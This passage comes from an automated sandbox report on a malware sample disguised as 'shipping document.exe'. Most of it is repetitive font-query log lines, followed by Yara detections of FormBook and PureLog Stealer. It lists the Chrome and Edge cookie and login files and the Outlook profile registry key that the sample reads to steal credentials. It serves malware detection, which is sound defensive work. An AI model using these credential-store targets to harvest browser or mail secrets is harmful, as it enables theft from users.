              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
              Source: oWRaEnEJAq.exe, 00000006.00000002.4110556530.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000006.00000000.1950565304.0000000001960000.00000002.00000001.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4110889183.0000000001A60000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: }Program Manager
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Users\user\Desktop\shipping document.exe VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candaral.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarali.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comic.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comici.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constan.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constani.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbell.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\cour.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\couri.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\framd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\gadugi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\gadugib.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgia.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgiai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\georgiaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Inkfree.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\javatext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelawUI.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelUIsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LeelaUIb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\lucon.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\l_10646.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgun.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgunsl.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\malgunbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\himalaya.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msjhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ntailu.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ntailub.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\phagspa.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\phagspab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\taileb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyhbd.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyh.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyhl.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msyi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mingliub.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\monbaiti.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\msgothic.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mvboli.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mmrtext.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\mmrtextb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Nirmala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\NirmalaS.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\NirmalaB.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\pala.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\palai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\palab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\palabi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\segoepr.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\segoeprb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\segoesc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\segoescb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\seguihis.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\simsun.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\simsunb.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SitkaI.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SitkaB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\Sitka.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SitkaZ.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\sylfaen.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\symbol.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\tahoma.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\tahomabd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\timesi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\timesbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\timesbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\trebuc.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\trebucit.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\trebucbd.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\trebucbi.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\verdana.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\verdanai.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\verdanab.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\verdanaz.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\webdings.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\wingding.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\YuGothR.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\YuGothL.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\YuGothB.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\YuGothM.ttc VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\holomdl2.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\AGENCYR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\AGENCYB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ALGER.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ANTQUAI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ANTQUAB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ANTQUABI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ARLRDBD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BAUHS93.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BELL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BELLI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BOD_BLAR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BOOKOSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BOOKOSI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BOOKOSBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\BRLNSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SCHLBKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SCHLBKB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SCHLBKBI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\CENTAUR.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\CENTURY.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\COLONNA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\COPRGTL.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\COPRGTB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\DUBAI-MEDIUM.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ERASMD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ERASLGHT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRABK.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FRABKIT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\FREESCPT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\GARA.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\GLSNECB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\HTOWERT.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LATINWD.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LBRITED.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LFAX.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\LFAXDI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\MAGNETOB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\NIAGENG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\PERB____.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\POORICH.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\ROCKI.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\SHOWG.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\TCCEB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\VINERITC.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\OFFSYMSB.TTF VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
              Source: C:\Users\user\Desktop\shipping document.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

              Stealing of Sensitive Information

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.43a9970.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.5ad0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.43a9970.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1677691413.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Tries to harvest and steal browser information (history, passwords, etc)
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
              Source: C:\Windows\SysWOW64\openfiles.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
              Tries to steal Mail credentials (via file / registry access)
              Source: C:\Windows\SysWOW64\openfiles.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

              Remote Access Functionality

              barindex
              Yara detected FormBook
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 2.2.shipping document.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000007.00000002.4110883708.00000000046C0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000006.00000002.4110968438.0000000003B00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2032796912.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000008.00000002.4113195669.0000000005770000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
